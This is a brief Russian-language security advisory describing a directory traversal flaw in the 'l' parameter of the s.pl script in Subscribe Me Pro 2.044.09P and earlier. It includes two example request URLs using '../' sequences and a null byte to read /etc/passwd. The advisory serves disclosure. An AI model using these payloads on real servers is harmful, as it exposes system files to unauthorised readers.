Программа: Subscribe Me Pro 2.044.09P и более ранние
версии

Уязвимость позволяет удаленному
пользователю просмотреть произвольные
файлы на уязвимой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре ‘l’ сценарий s.pl.
Удаленный пользователь может с помощью
специально сформированного URL, содержащего
символы обхода каталога, просмотреть
произвольные файлы на системе.

Примеры:

www.site.com/[dir]/s.pl?e=1&subscribe=subscribe& l=../../../../../../../../etc/passwd%00&SUBMIT=
%20%20Submit%20%20

www.site.com/[dir]/s.pl?e=enter%20your%20email %20address%20here&subscribe=subscribe&
l=../../../../../../../../etc/passwd%00



Оставить мнение